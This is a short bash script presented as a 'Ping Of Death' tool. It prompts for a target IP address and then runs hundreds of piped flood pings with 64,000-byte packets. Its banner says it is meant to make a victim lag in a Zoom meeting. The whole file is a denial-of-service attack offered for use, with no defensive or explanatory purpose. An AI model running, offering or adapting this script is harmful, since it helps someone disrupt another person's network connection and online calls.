blink="\033[5m"
rblink="\033[25m"
echo   '                      |----------------------------------------------------------------------------------------|'
printf '                      |                         '$blink'    Ping Of Death '$rblink'                                             |\n'
echo   '                      |----------------------------------------------------------------------------------------|'
sleep 0.5
echo '[Pod] Used in zoom meeting, Lag Your Voice By PODDING Your Ip'
sleep 0.9
echo '[Pod] Starting ... '
sleep 0.5
printf '[Pod] Enter Your IP Address: '
read ip
sleep 1
echo 'OK ! '
sleep 1
echo '[Pod] Alert: Attack Has Started, CTRL+C To Stop'
ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f >> /dev/null
